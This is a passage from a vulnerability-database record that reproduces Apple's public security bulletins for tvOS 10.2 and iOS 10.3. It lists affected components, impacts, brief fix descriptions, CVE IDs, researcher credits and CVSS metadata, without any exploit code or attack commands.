root privileges\n\nDescription: A race condition was addressed through improved memory handling.\n\nCVE-2017-2456: lokihardt of Google Project Zero\n\n**Kernel**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A use after free issue was addressed through improved memory management.\n\nCVE-2017-2472: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: A malicious application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2473: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: An off-by-one issue was addressed through improved bounds checking.\n\nCVE-2017-2474: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A race condition was addressed through improved locking.\n\nCVE-2017-2478: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A buffer overflow issue was addressed through improved memory handling.\n\nCVE-2017-2482: Ian Beer of Google Project Zero\n\nCVE-2017-2483: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with elevated privileges\n\nDescription: A memory corruption issue was addressed through improved memory handling.\n\nCVE-2017-2490: Ian Beer of Google Project Zero, The UK's National Cyber Security Centre (NCSC)\n\nEntry added March 31, 2017\n\n**Keyboards**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code\n\nDescription: A buffer overflow was addressed through improved bounds checking.\n\nCVE-2017-2458: Shashank (@cyberboyIndia)\n\n**Keychain**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: An attacker who is able to intercept TLS connections may be able to read secrets protected by iCloud Keychain.\n\nDescription: In certain circumstances, iCloud Keychain failed to validate the authenticity of OTR packets. This issue was addressed through improved validation.\n\nCVE-2017-2448: Alex Radocea of Longterm Security, Inc.\n\nEntry updated March 30, 2017\n\n**libarchive**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: A local attacker may be able to change file system permissions on arbitrary directories\n\nDescription: A validation issue existed in the handling of symlinks. This issue was addressed through improved validation of symlinks.\n\nCVE-2017-2390: Omer Medan of enSilo Ltd\n\n**libc++abi**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Demangling a malicious C++ application may lead to arbitrary code execution\n\nDescription: A use after free issue was addressed through improved memory management.\n\nCVE-2017-2441\n\n**libxslt**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Multiple vulnerabilities in libxslt\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-5029: Holger Fuhrmannek\n\nEntry added March 28, 2017\n\n**Security**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with root privileges\n\nDescription: A buffer overflow was addressed through improved bounds checking.\n\nCVE-2017-2451: Alex Radocea of Longterm Security, Inc.\n\n**Security**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted x509 certificate may lead to arbitrary code execution\n\nDescription: A memory corruption issue existed in the parsing of certificates. This issue was addressed through improved input validation.\n\nCVE-2017-2485: Aleksandar Nikolic of Cisco Talos\n\n**WebKit**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may exfiltrate data cross-origin\n\nDescription: A prototype access issue was addressed through improved exception handling.\n\nCVE-2017-2386: Andr\u00e9 Bargull\n\n**WebKit**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved input validation.\n\nCVE-2017-2394: Apple\n\nCVE-2017-2396: Apple\n\nCVE-2016-9642: Gustavo Grieco\n\n**WebKit**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-2395: Apple\n\nCVE-2017-2454: Ivan Fratric of Google Project Zero, Zheng Huang of the Baidu Security Lab working with Trend Micro's Zero Day Initiative\n\nCVE-2017-2455: Ivan Fratric of Google Project Zero\n\nCVE-2017-2459: Ivan Fratric of Google Project Zero\n\nCVE-2017-2460: Ivan Fratric of Google Project Zero\n\nCVE-2017-2464: Natalie Silvanovich of Google Project Zero, Jeonghoon Shin\n\nCVE-2017-2465: Zheng Huang and Wei Yuan of Baidu Security Lab\n\nCVE-2017-2466: Ivan Fratric of Google Project Zero\n\nCVE-2017-2468: lokihardt of Google Project Zero\n\nCVE-2017-2469: lokihardt of Google Project Zero\n\nCVE-2017-2470: lokihardt of Google Project Zero\n\nCVE-2017-2476: Ivan Fratric of Google Project Zero\n\nCVE-2017-2481: 0011 working with Trend Micro's Zero Day Initiative\n\nEntry updated June 20, 2017\n\n**WebKit**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A type confusion issue was addressed through improved memory handling.\n\nCVE-2017-2415: Kai Kang of Tencent's Xuanwu Lab (tentcent.com)\n\n**WebKit**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to high memory consumption\n\nDescription: An uncontrolled resource consumption issue was addressed through improved regex processing.\n\nCVE-2016-9643: Gustavo Grieco\n\n**WebKit**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: A malicious website may exfiltrate data cross-origin\n\nDescription: A validation issue existed in the handling of page loading. This issue was addressed through improved logic.\n\nCVE-2017-2367: lokihardt of Google Project Zero\n\n**WebKit**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to universal cross site scripting\n\nDescription: A logic issue existed in the handling of frame objects. This issue was addressed with improved state management.\n\nCVE-2017-2445: lokihardt of Google Project Zero\n\n**WebKit**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A logic issue existed in the handling of strict mode functions. This issue was addressed with improved state management.\n\nCVE-2017-2446: Natalie Silvanovich of Google Project Zero\n\n**WebKit**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Visiting a maliciously crafted website may compromise user information\n\nDescription: A memory corruption issue was addressed through improved memory handling.\n\nCVE-2017-2447: Natalie Silvanovich of Google Project Zero\n\n**WebKit**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-2463: Kai Kang (4B5F5F4B) of Tencent's Xuanwu Lab (tencent.com) working with Trend Micro's Zero Day Initiative\n\nEntry added March 28, 2017\n\n**WebKit**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to universal cross site scripting\n\nDescription: A logic issue existed in frame handling. This issue was addressed through improved state management.\n\nCVE-2017-2475: lokihardt of Google Project Zero\n\n**WebKit**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may exfiltrate data cross-origin\n\nDescription: A validation issue existed in element handling. This issue was addressed through improved validation.\n\nCVE-2017-2479: lokihardt of Google Project Zero\n\nEntry added March 28, 2017\n\n**WebKit**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may exfiltrate data cross-origin\n\nDescription: A validation issue existed in element handling. This issue was addressed through improved validation.\n\nCVE-2017-2480: lokihardt of Google Project Zero\n\nCVE-2017-2493: lokihardt of Google Project Zero\n\nEntry updated April 24, 2017\n\n\n\n## Additional recognition\n\n**XNU**\n\nWe would like to acknowledge Lufeng Li of Qihoo 360 Vulcan Team for their assistance.\n", "edition": 3, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-06-20T10:43:59", "title": "About the security content of tvOS 10.2 - Apple Support", "type": "apple", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2430", "CVE-2016-9643", "CVE-2017-2479", "CVE-2017-2461", "CVE-2017-2480", "CVE-2017-2450", "CVE-2017-2492", "CVE-2017-2395", "CVE-2016-3619", "CVE-2017-2441", "CVE-2017-2444", "CVE-2017-2435", "CVE-2017-2439", "CVE-2017-2447", "CVE-2017-2459", "CVE-2017-2379", "CVE-2017-2454", "CVE-2017-2428", "CVE-2017-2483", "CVE-2017-2456", "CVE-2017-2485", "CVE-2017-2455", "CVE-2017-2470", "CVE-2017-2469", "CVE-2017-2464", "CVE-2017-2396", "CVE-2017-2451", "CVE-2017-2465", "CVE-2017-2406", "CVE-2017-2474", "CVE-2017-2446", "CVE-2017-2472", "CVE-2017-2475", "CVE-2017-2468", "CVE-2017-2390", "CVE-2017-2417", "CVE-2017-2462", "CVE-2017-2487", "CVE-2017-2491", "CVE-2017-5029", "CVE-2017-2482", "CVE-2017-2466", "CVE-2017-2458", "CVE-2017-2448", "CVE-2017-2401", "CVE-2017-2481", "CVE-2017-2467", "CVE-2016-9642", "CVE-2017-2415", "CVE-2017-2490", "CVE-2017-2407", "CVE-2017-2473", "CVE-2017-2416", "CVE-2017-2394", "CVE-2017-2367", "CVE-2017-2386", "CVE-2017-2460", "CVE-2017-2463", "CVE-2017-2493", "CVE-2017-2445", "CVE-2017-2440", "CVE-2017-2476", "CVE-2017-2432", "CVE-2017-2478"], "modified": "2017-06-20T10:43:59", "id": "APPLE:HT207601", "href": "https://support.apple.com/kb/HT207601", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-26T19:33:06", "description": "# About the security content of iOS 10.3\n\nThis document describes the security content of iOS 10.3.\n\n## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n\n\n## iOS 10.3\n\nReleased March 27, 2017\n\n**Accounts**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: A user may be able to view an Apple ID from the lock screen\n\nDescription: A prompt management issue was addressed by removing iCloud authentication prompts from the lock screen.\n\nCVE-2017-2397: Suprovici Vadim of UniApps team, an anonymous researcher\n\n**Audio**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted audio file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2430: an anonymous researcher working with Trend Micro\u2019s Zero Day Initiative\n\nCVE-2017-2462: an anonymous researcher working with Trend Micro\u2019s Zero Day Initiative\n\n**Carbon**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted .dfont file may lead to arbitrary code execution\n\nDescription: A buffer overflow existed in the handling of font files. This issue was addressed through improved bounds checking.\n\nCVE-2017-2379: John Villamil, Doyensec, riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\n**CoreGraphics**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted image may lead to a denial of service\n\nDescription: An infinite recursion was addressed through improved state management.\n\nCVE-2017-2417: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\n**CoreGraphics**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved input validation.\n\nCVE-2017-2444: Mei Wang of 360 GearTeam\n\n**CoreText**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted font file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2435: John Villamil, Doyensec\n\n**CoreText**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted font may result in the disclosure of process memory\n\nDescription: An out-of-bounds read was addressed through improved input validation.\n\nCVE-2017-2450: John Villamil, Doyensec\n\n**CoreText**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted text message may lead to application denial of service\n\nDescription: A resource exhaustion issue was addressed through improved input validation.\n\nCVE-2017-2461: Isaac Archambault of IDAoADI, an anonymous researcher\n\n**DataAccess**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Configuring an Exchange account with a mistyped email address may resolve to an unexpected server\n\nDescription: An input validation issue existed in the handling of Exchange email addresses. This issue was addressed through improved input validation.\n\nCVE-2017-2414: Ilya Nesterov and Maxim Goncharov\n\n**FontParser**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted font file may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved input validation.\n\nCVE-2017-2487: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\nCVE-2017-2406: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\n**FontParser**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Parsing a maliciously crafted font file may lead to an unexpected application termination or arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved input validation.\n\nCVE-2017-2407: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\n**FontParser**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted font may result in the disclosure of process memory\n\nDescription: An out-of-bounds read was addressed through improved input validation.\n\nCVE-2017-2439: John Villamil, Doyensec\n\n**HomeKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Home Control may unexpectedly appear on Control Center\n\nDescription: A state issue existed in the handling of Home Control. This issue was addressed through improved validation.\n\nCVE-2017-2434: Suyash Narain of India\n\n**HTTPProtocol**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: A malicious HTTP/2 server may be able to cause undefined behavior\n\nDescription: Multiple issues existed in nghttp2 before 1.17.0. These were addressed by updating nghttp2 to version 1.17.0.\n\nCVE-2017-2428\n\nEntry updated March 28, 2017\n\n**ImageIO**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted image may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2416: Qidan He (\u4f55\u6dc7\u4e39, @flanker_hqd) of KeenLab, Tencent\n\n**ImageIO**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Viewing a maliciously crafted JPEG file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2432: an anonymous researcher working with Trend Micro's Zero Day Initiative\n\n**ImageIO**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted file may lead to an unexpected application termination or arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2467\n\n**ImageIO**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted image may lead to unexpected application termination\n\nDescription: An out-of-bound read existed in LibTIFF versions before 4.0.7. This was addressed by updating LibTIFF in ImageIO to version 4.0.7.\n\nCVE-2016-3619\n\n**iTunes Store**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: An attacker in a privileged network position may be able to tamper with iTunes network traffic\n\nDescription: Requests to iTunes sandbox web services were sent in cleartext. This was addressed by enabling HTTPS.\n\nCVE-2017-2412: Richard Shupak (linkedin.com/in/rshupak)\n\n**JavaScriptCore**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A use after free issue was addressed through improved memory management.\n\nCVE-2017-2491: Apple\n\nEntry added May 2, 2017\n\n**JavaScriptCore**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted web page may lead to universal cross site scripting\n\nDescription: A prototype issue was addressed through improved logic.\n\nCVE-2017-2492: lokihardt of Google Project Zero\n\nEntry updated April 24, 2017\n\n**Kernel**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2398: Lufeng Li of Qihoo 360 Vulcan Team\n\nCVE-2017-2401: Lufeng Li of Qihoo 360 Vulcan Team\n\n**Kernel**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: An integer overflow was addressed through improved input validation.\n\nCVE-2017-2440: an anonymous researcher\n\n**Kernel**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: A malicious application may be able to execute arbitrary code with root privileges\n\nDescription: A race condition was addressed through improved memory handling.\n\nCVE-2017-2456: lokihardt of Google Project Zero\n\n**Kernel**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A use after free issue was addressed through improved memory management.\n\nCVE-2017-2472: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: A malicious application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2473: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: An off-by-one issue was addressed through improved bounds checking.\n\nCVE-2017-2474: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A race condition was addressed through improved locking.\n\nCVE-2017-2478: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A buffer overflow issue was addressed through improved memory handling.\n\nCVE-2017-2482: Ian Beer of Google Project Zero\n\nCVE-2017-2483: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: An application may be able to execute arbitrary code with elevated privileges\n\nDescription: A memory corruption issue was addressed through improved memory handling.\n\nCVE-2017-2490: Ian Beer of Google Project Zero, The UK's National Cyber Security Centre (NCSC)\n\nEntry added March 31, 2017\n\n**Keyboards**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: An application may be able to execute arbitrary code\n\nDescription: A buffer overflow was addressed through improved bounds checking.\n\nCVE-2017-2458: Shashank (@cyberboyIndia)\n\n**Keychain**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: An attacker who is able to intercept TLS connections may be able to read secrets protected by iCloud Keychain.\n\nDescription: In certain circumstances, iCloud Keychain failed to validate the authenticity of OTR packets. This issue was addressed through improved validation.\n\nCVE-2017-2448: Alex Radocea of Longterm Security, Inc.\n\nEntry updated March 30, 2017\n\n**libarchive**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: A local attacker may be able to change file system permissions on arbitrary directories\n\nDescription: A validation issue existed in the handling of symlinks. This issue was addressed through improved validation of symlinks.\n\nCVE-2017-2390: Omer Medan of enSilo Ltd\n\n**libc++abi**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Demangling a malicious C++ application may lead to arbitrary code execution\n\nDescription: A use after free issue was addressed through improved memory management.\n\nCVE-2017-2441\n\n**libxslt**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Multiple vulnerabilities in libxslt\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-5029: Holger Fuhrmannek\n\nEntry added March 28, 2017\n\n**Pasteboard**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: A person with physical access to an iOS device may read the pasteboard\n\nDescription: The pasteboard was encrypted with a key protected only by the hardware UID. This issue was addressed by encrypting the pasteboard with a key protected by the hardware UID and the user's passcode.\n\nCVE-2017-2399\n\n**Phone**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: A third party app can initiate a phone call without user interaction\n\nDescription: An issue existed in iOS allowing for calls without prompting. This issue was addressed by prompting a user to confirm call initiation.\n\nCVE-2017-2484\n\n**Profiles**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: An attacker may be able to exploit weaknesses in the DES cryptographic algorithm\n\nDescription: Support for the 3DES cryptographic algorithm was added to the SCEP client and DES was deprecated.\n\nCVE-2017-2380: an anonymous researcher\n\n**Quick Look**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Tapping a tel link in a PDF document could trigger a call without prompting the user\n\nDescription: An issue existed when checking the tel URL before initiating calls. This issue was addressed with the addition of a confirmation prompt.\n\nCVE-2017-2404: Tuan Anh Ngo (Melbourne, Australia), Christoph Nehring\n\n**Safari**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Visiting a malicious website may lead to address bar spoofing\n\nDescription: A state management issue was addressed by disabling text input until the destination page loads.\n\nCVE-2017-2376: an anonymous researcher, Michal Zalewski of Google Inc, Muneaki Nishimura (nishimunea) of Recruit Technologies Co., Ltd., Chris Hlady of Google Inc, an anonymous researcher, Yuyang Zhou of Tencent Security Platform Department (security.tencent.com)\n\n**Safari**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: A local user may be able to discover websites a user has visited in Private Browsing\n\nDescription: An issue existed in SQLite deletion. This issue was addressed through improved SQLite cleanup.\n\nCVE-2017-2384\n\n**Safari**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may present authentication sheets over arbitrary web sites\n\nDescription: A spoofing and denial-of-service issue existed in the handling of HTTP authentication. This issue was addressed through making HTTP authentication sheets non-modal.\n\nCVE-2017-2389: ShenYeYinJiu of Tencent Security Response Center, TSRC\n\n**Safari**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Visiting a malicious website by clicking a link may lead to user interface spoofing\n\nDescription: A spoofing issue existed in the handling of FaceTime prompts. This issue was addressed through improved input validation.\n\nCVE-2017-2453: xisigr of Tencent's Xuanwu Lab (tencent.com)\n\n**Safari Reader**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Enabling the Safari Reader feature on a maliciously crafted webpage may lead to universal cross site scripting\n\nDescription: Multiple validation issues were addressed through improved input sanitization.\n\nCVE-2017-2393: Erling Ellingsen\n\n**SafariViewController**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Cache state is not properly kept in sync between Safari and SafariViewController when a user clears Safari cache\n\nDescription: An issue existed in clearing Safari cache information from SafariViewController. This issue was addressed by improving cache state handling.\n\nCVE-2017-2400: Abhinav Bansal of Zscaler, Inc.\n\n**Sandbox Profiles**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, and iPod touch 6th generation\n\nImpact: A malicious application may be able to access the iCloud user record of a signed in user\n\nDescription: An access issue was addressed through additional sandbox restrictions on third party applications.\n\nCVE-2017-6976: George Dan (@theninjaprawn)\n\nEntry added August 1, 2017\n\n**Security**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Validating empty signatures with SecKeyRawVerify() may unexpectedly succeed\n\nDescription: An validation issue existed with cryptographic API calls. This issue was addressed through improved parameter validation.\n\nCVE-2017-2423: an anonymous researcher\n\n**Security**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: An application may be able to execute arbitrary code with root privileges\n\nDescription: A buffer overflow was addressed through improved bounds checking.\n\nCVE-2017-2451: Alex Radocea of Longterm Security, Inc.\n\n**Security**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted x509 certificate may lead to arbitrary code execution\n\nDescription: A memory corruption issue existed in the parsing of certificates. This issue was addressed through improved input validation.\n\nCVE-2017-2485: Aleksandar Nikolic of Cisco Talos\n\n**Siri**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Siri might reveal text message contents while the device is locked\n\nDescription: An insufficient locking issue was addressed with improved state management.\n\nCVE-2017-2452: Hunter Byrnes\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Dragging and dropping a maliciously crafted link may lead to bookmark spoofing or arbitrary code execution\n\nDescription: A validation issue existed in bookmark creation. This issue was addressed through improved input validation.\n\nCVE-2017-2378: xisigr of Tencent's Xuanwu Lab (tencent.com)\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Visiting a malicious website may lead to address bar spoofing\n\nDescription: An inconsistent user interface issue was addressed through improved state management.\n\nCVE-2017-2486: redrain of light4freedom\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may exfiltrate data cross-origin\n\nDescription: A prototype access issue was addressed through improved exception handling.\n\nCVE-2017-2386: Andr\u00e9 Bargull\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved input validation.\n\nCVE-2017-2394: Apple\n\nCVE-2017-2396: Apple\n\nCVE-2016-9642: Gustavo Grieco\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-2395: Apple\n\nCVE-2017-2454: Ivan Fratric of Google Project Zero, Zheng Huang of the Baidu Security Lab working with Trend Micro's Zero Day Initiative\n\nCVE-2017-2455: Ivan Fratric of Google Project Zero\n\nCVE-2017-2457: lokihardt of Google Project Zero\n\nCVE-2017-2459: Ivan Fratric of Google Project Zero\n\nCVE-2017-2460: Ivan Fratric of Google Project Zero\n\nCVE-2017-2464: Jeonghoon Shin, natashenka of Google Project Zero\n\nCVE-2017-2465: Zheng Huang and Wei Yuan of Baidu Security Lab\n\nCVE-2017-2466: Ivan Fratric of Google Project Zero\n\nCVE-2017-2468: lokihardt of Google Project Zero\n\nCVE-2017-2469: lokihardt of Google Project Zero\n\nCVE-2017-2470: lokihardt of Google Project Zero\n\nCVE-2017-2476: Ivan Fratric of Google Project Zero\n\nCVE-2017-2481: 0011 working with Trend Micro's Zero Day Initiative\n\nEntry updated June 20, 2017\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A type confusion issue was addressed through improved memory handling.\n\nCVE-2017-2415: Kai Kang of Tencent's Xuanwu Lab (tentcent.com)\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing 